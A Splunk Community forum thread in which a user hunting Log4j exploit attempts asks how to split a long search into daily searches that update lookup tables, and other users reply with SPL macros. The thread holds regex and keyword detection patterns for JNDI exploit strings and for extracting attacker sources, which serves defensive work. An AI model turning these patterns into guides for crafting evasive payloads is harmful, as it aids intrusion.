Splunk Search

Break up search over large timeframe into searches of smaller timeframes

cyberdiver
Explorer
TLDR: I'm trying to automate the large 25 day search to break up into 25 separate one day searches.

I'm updating a lookup table that is tracking which indexes are affected by the new log4j exploit.  I do this so that I can only have to search through the affected indexes with subsequent searches.  This lookup table takes hours each time it is updated for a day.  Problem being, I need to know all of the affected indexes over all of the days log4j since December 10th or so.  

Query that updates lookup table:

 

NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv​

 

Each time this query finishes, it appends log4j-exploit-affected indexes to the lookup table.  I need to automate the scanning over a large timeframe (December 10th 2021 - January 5th 2022).  However, I want the lookup table to update as it runs over each day.  I'm trying to automate the large 25 day search to break up into 25 separate one day searches.  This also makes it so that if the search fails, then I don't lose all progress.  I can then apply this same methodology to other searches.

Lookup Table (Log4J_affected_indexes)

Index
index_1
index_2

 

How I've tried to solve the problem

  • Commands I've tried while attempting to solve:
    • foreach
    • map
    • gentimes
    • subsearch
    • saved searches

Gentimes (smaller timeframes) -> map

Explanation of Query below:

The gentimes part creates a table based on the selected timerange:

Earliest Latest
01/02/2022:00:00:0001/03/2022:00:00:00
01/03/2022:00:00:0001/04/2022:00:00:00
01/04/2022:00:00:0001/05/2022:00:00:00

 

I try to pass those values to a subsearch as the earliest and latest parameters using map.  I understand now that map doesn't seem to work for this, and I get no results when the search runs.

(gentimes and map) Query:

 

|gentimes start=-1
		 |addinfo
		 |eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
		 |mvexpand datetime
		 |fields datetime
		 |eval latest=datetime
		 |eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
		 |eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
		 |fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"

 

Gentimes subsearch -> main search

Explanation of Query below:

I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:

Earliest Latest
01/02/2022:00:00:0001/03/2022:00:00:00
01/03/2022:00:00:0001/04/2022:00:00:00
01/04/2022:00:00:0001/05/2022:00:00:00

 

This doesn't give me errors.  However, I get no matches.  I can almost guarantee this isn't running separate searches per value displayed in the above table.  I'm not sure how this can be done.

(gentimes subsearch) Query:

 

NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
	|addinfo
	|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"), 
         "%m/%d/%Y:%H:%M:%S")
	|mvexpand datetime
	|fields datetime
	|eval latest=datetime
	|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
	|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
	|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv

 

Conclusion

Other failed attempts:

  • using foreach (can't do non-streaming)
  • passing earliest and latest parameters to saved-search
    • savedsearch doesn't work this way

Other solutions I've thought of:

  • Running subsearch that updates a smaller_timeframe.csv file that keeps track of the smaller timeframes.  Then, pass those timeframe parameters (earliest / latest) into a search somehow.
  • Somehow do a recursive sort of search where each search triggers another search to go.  Consequently, I could have a search trigger another search with the earliest and latest values incremented forward one day (or any amount of time).
  • Maybe, Splunk has a feature (not on the search head) that can automate the same search over small timeframes, and over a large period of time.  Maybe this unknown-to-me feature also has scheduling built into it.
If there is any other information that I can give to help others solve this with me, then just ask.  I can edit this post...
Labels (3)
0 Karma
1 Solution

cyberdiver
Explorer

The solution to this "breaking up large timeframe into smaller timeframes" uses macros.  Macro and the search are listed below:

Search Query over 7 days (split up into 7 searches)

- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j.  Therefore, it speeds up as more indexes are searched.  The next step of this process is to use the same type of macro to narrow down affected sourcetypes.

 

NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"@d")
    | eval earliest=latest-(24*60*60)
    | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
    | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
    | table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]

 

 

 Lookup Table Updater Macro

 

append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
	[| makeresults
	    | addinfo
	    | eval latest=relative_time(info_max_time,"-$day$d@d")
	    | eval earliest=latest-(24*60*60)
            | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
            | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")                      
	    | table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]

 

  • Possible Improvements:
    • Recursive macros 
      • You could have an if statement within the macro that sort of acts like a for loop and recursively calls the next day down.
      • Example:  You are searching 7 days so put 7 as an argument to the macro.  It then checks using eval - "IF day is more than 1 then pass that same macro with current_day-1 as the day argument - ELSE pass 1".

 

View solution in original post

0 Karma

cyberdiver
Explorer

The solution to this "breaking up large timeframe into smaller timeframes" uses macros.  Macro and the search are listed below:

Search Query over 7 days (split up into 7 searches)

- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j.  Therefore, it speeds up as more indexes are searched.  The next step of this process is to use the same type of macro to narrow down affected sourcetypes.

 

NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"@d")
    | eval earliest=latest-(24*60*60)
    | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
    | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
    | table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]

 

 

 Lookup Table Updater Macro

 

append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
	[| makeresults
	    | addinfo
	    | eval latest=relative_time(info_max_time,"-$day$d@d")
	    | eval earliest=latest-(24*60*60)
            | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
            | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")                      
	    | table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]

 

  • Possible Improvements:
    • Recursive macros 
      • You could have an if statement within the macro that sort of acts like a for loop and recursively calls the next day down.
      • Example:  You are searching 7 days so put 7 as an argument to the macro.  It then checks using eval - "IF day is more than 1 then pass that same macro with current_day-1 as the day argument - ELSE pass 1".

 

0 Karma

ITWhisperer
SplunkTrust
SplunkTrust

You could try something like this:

NOT 
    [| inputlookup indexes.csv 
    | table index] 
    [| makeresults 
    | addinfo 
    | eval latest=relative_time(info_max_time,"@d") 
    | eval earliest=latest-(24*60*60) 
    | table earliest latest] 
| table index 
| inputlookup append=true indexes.csv 
| dedup index 
| outputlookup indexes.csv 
| where index="1" 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-1d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-2d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-3d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-4d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-5d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-6d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-7d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [| inputlookup indexes.csv]

Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.

If you create a macro for the append parts, e.g. index_checker(1) with argument day

| append
    [search NOT 
    [| inputlookup indexes.csv 
        | table index]
    [| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"-$day$d@d")
    | eval earliest=latest-(24*60*60)
    | table earliest latest]
    | table index
    | inputlookup append=true indexes.csv
    | dedup index
    | outputlookup indexes.csv
    | where index="1"]

 The search can be reduced to this:

NOT 
    [| inputlookup indexes.csv 
        | table index]
    [| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"@d")
    | eval earliest=latest-(24*60*60)
    | table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
    [| inputlookup indexes.csv]

cyberdiver
Explorer

Does this mean that each day would run separately and in a certain order?  Do they run at the same time?  If not, which one would run first?

Also, you give me a great idea.  I might be able to nest multiple macros to solve this in a way that can be used in other cases. 😁


0 Karma

johnhuang
Motivator
  • There could be opportunities to use keyword/string search which are magnitudes faster.
  • Your regex could be significantly improved to be more efficient.

Could you provide a few examples of the different iterations of the JDNI string that you are trying match against?

cyberdiver
Explorer

There are hundreds of different iterations (it seems), after using that regex.  The bigger issue is trying to update the 3 lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected sourcetypes.csv, and log4j_malicious_sources.csv).  Log4J started showing up around December 10th, so I need to log every malicious source that I can, and then query if there was outbound communication back to those sources.  This means having to query ~25 days of logs, and extracting the malicious sources from them.  Doing a full 25 day search probably wouldn't go well, so breaking it up automatically into 25 searches that each last about two hours means it would take ~3 days to run, and then I query again to look for outbound communications.

I even wrote regex to extract those malicious sources (IP or URL) from the raw data:

 

(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})

 

 

0 Karma

johnhuang
Motivator

Simplify your searches, reconsider whether it's necessary to find every possible iteration of the jdni string and whether it's necessary to check every exploit attempt.

For example this "global" search took 4 seconds to complete against a 1TB/day Splunk environment.

("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string


If you have a NGEN firewall, look for LDAP or DNS outbound connections.

Get Updates on the Splunk Community!

Enterprise Security Content Update (ESCU) | New Releases

In December, the Splunk Threat Research Team had 1 release of new security content via the Enterprise Security ...

Why am I not seeing the finding in Splunk Enterprise Security Analyst Queue?

(This is the first of a series of 2 blogs). Splunk Enterprise Security is a fantastic tool that offers robust ...

Index This | What are the 12 Days of Splunk-mas?

December 2024 Edition Hayyy Splunk Education Enthusiasts and the Eternally Curious!  We’re back with another ...